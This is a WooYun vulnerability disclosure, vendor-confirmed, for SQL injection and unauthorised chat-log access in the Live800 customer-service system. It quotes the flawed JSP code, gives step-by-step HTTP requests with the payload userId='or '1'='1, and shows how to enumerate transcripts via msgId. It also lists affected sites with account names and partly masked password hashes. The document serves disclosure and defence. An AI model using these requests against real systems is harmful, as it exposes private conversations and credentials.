当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177533

漏洞标题:Live800在线客服系统SQL注射/未授权查看对话记录

相关厂商:live800.com

漏洞作者: applychen

提交时间:2016-02-21 22:49

修复时间:2016-05-22 11:40

公开时间:2016-05-22 11:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-21: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经确认,细节仅向厂商公开
2016-02-25: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-17: 细节向核心白帽子及相关领域专家公开
2016-04-27: 细节向普通白帽子公开
2016-05-07: 细节向实习白帽子公开
2016-05-22: 细节向公众公开

简要描述:

SQL注射影响诸多大站,可看对话记录。

详细说明:

SQL注射发生在chatListForVisitor.jsp文件中的userId参数:

String companyId = request.getParameter("companyId");
	String userId = request.getParameter("userId");
	String sId = request.getParameter("sId");
	try{
		if(StringUtils.isNullOrLengthZero(new String[]{companyId,userId,sId})){
			out.println("<p align='center'><font color='red'>错误请求</font></p>");
			return;
		}
		if(!sId.equals(session.getId())){
			out.println("<p align='center'><font color='red'>非法请求</font></p>");
			return;
		}
		if(session.getAttribute("hasLogin")==null){
			out.println("<p align='center'><font color='red'>非法请求</font></p>");
			return;
		}
	}catch(Exception e){
		out.println("<p align='center'><font color='red'>非法请求</font></p>");
		return;
	}
	java.text.SimpleDateFormat formatter = new java.text.SimpleDateFormat(
					"yyyy-MM-dd");
	GregorianCalendar day = new GregorianCalendar();
	Date today = day.getTime();
	String todayStr = formatter.format(today);
	day.add(GregorianCalendar.DATE, -30);
	Date yesterday = day.getTime();
	String yesterdayStr = formatter.format(yesterday);
	Map<String,String> speParaMap = new HashMap<String,String>();
	String fromTime = yesterdayStr+" 00:00:00";
	String toTime = todayStr+" 23:59:59";
	speParaMap.put("companyId",companyId);
	speParaMap.put("userId",userId);
	speParaMap.put("fromTime",fromTime);
	speParaMap.put("toTime",toTime);
	pageContext.setAttribute("companyId",companyId);
	boolean res = ValueListUtil.setValueList(speParaMap, pageContext,
			"chatInfoAdapter_chatQuery_for_visitor", "list");
	if (!res) {
		request.setAttribute("list", new DefaultListBackedValueList(
				null, null));
	}


要成功访问这个文件要满足以下两个条件:

if(!sId.equals(session.getId())){
			out.println("<p align='center'><font color='red'>非法请求</font></p>");
			return;
		}
		if(session.getAttribute("hasLogin")==null){
			out.println("<p align='center'><font color='red'>非法请求</font></p>");
			return;
		}


第一是sId要与sessionid相等,第二是session里面的hasLogin不等于null。
第一处条件,在上一个漏洞描述过http://**.**.**.**/bugs/wooyun-2016-0177183不再赘述。
第二处条件,在chatbox.jsp文件中设置了hasLogin为1:

//如果是出现韦博英语,选择地区后就会重新刷这个页面,就会获取不到referer,所以加以标识。
		session.setAttribute("hasLogin","1");
		CompanyInfo companyInfo = DBManager.getValidCompanyInfo(companyId);


在利用的时候首先访问chatbox.jsp往session中写入hasLogin,然后记下其中的JSESSIONID:

GET /live800/chatClient/chatbox.jsp?companyID=1&configID=10&skillId=17&enterurl=http%3A%2F%2F**.**.**.**%2Findex.html&k=1&remark= HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive


1.png


然后使用刚才记录下的JSESSIONID构造以下的数据包[标记1]:

POST /live800/chatListForVisitor.jsp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=AA2AC6B345DC64287B69997954DE91A4
Connection: keep-alive
Content-Length: 60
companyId=8922&userId=1&sId=AA2AC6B345DC64287B69997954DE91A4


当userId='or '1'='1即可查看对话记录:

POST /live800/chatListForVisitor.jsp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=AA2AC6B345DC64287B69997954DE91A4
Connection: keep-alive
Content-Length: 60
companyId=8922&userId='or '1'='1&sId=AA2AC6B345DC64287B69997954DE91A4


2.png


通过以下的数据包即可查询聊天记录:

GET /live800/chatDetail_brief_show_for_visitor.jsp?companyId=8922&msgId=3841000 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/live800/chatListForVisitor.jsp
Cookie: JSESSIONID=AA2AC6B345DC64287B69997954DE91A4
Connection: close


3.png


遍历msgId参数即可查询大量的聊天记录:

4.png


将[标记1]的数据包放到SQLMAP中跑出数据:

5.png


登录后台查看数据http://**.**.**.**/bugs/wooyun-2015-0147511:

6.png


7.png


列出部分受影响的站点:

http://**.**.**.**/live800/:::admin::::zV6nPNWP******GyZsuY=
http://**.**.**.**/live800/::: gys_德恩特02::::cvIO/fr******hxi0=
http://**.**.**.**/live800/:::1001::::NpZ+40n******JrLtP8=
http://**.**.**.**/live800/:::dinglong1::::ysF8qST******zN6LQ=
http://**.**.**.**/live800/:::002::::ok3/8CIFF******zTVY=
http://**.**.**.**/live800/:::80002::::5r0uWpi+******QbCGhwc=
http://**.**.**.**/live800/:::bangfringe::::0FL4X6******Eqao=
http://**.**.**.**:8080/live800/:::027022::::+yIR83******Q8i+50=
http://**.**.**.**/live800/:::abbyouyang::::fEqNC******4lBs=
http://**.**.**.**/live800/:::bing_zeng::::GQFXt2******xhphg=
http://**.**.**.**/live800/:::ailizhen::::Bf50Yc******an0Oo=
http://**.**.**.**/live/:::123456::::ItpSfT******PH/7U=
http://**.**.**.**/live800/:::caiqj::::Y2fEjdG******Up9e4=


漏洞证明:

同上

修复方案:

配置filter全局过滤request输入

版权声明:转载请注明来源 applychen@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-02-22 11:31

厂商回复:

非常感谢

最新状态:

暂无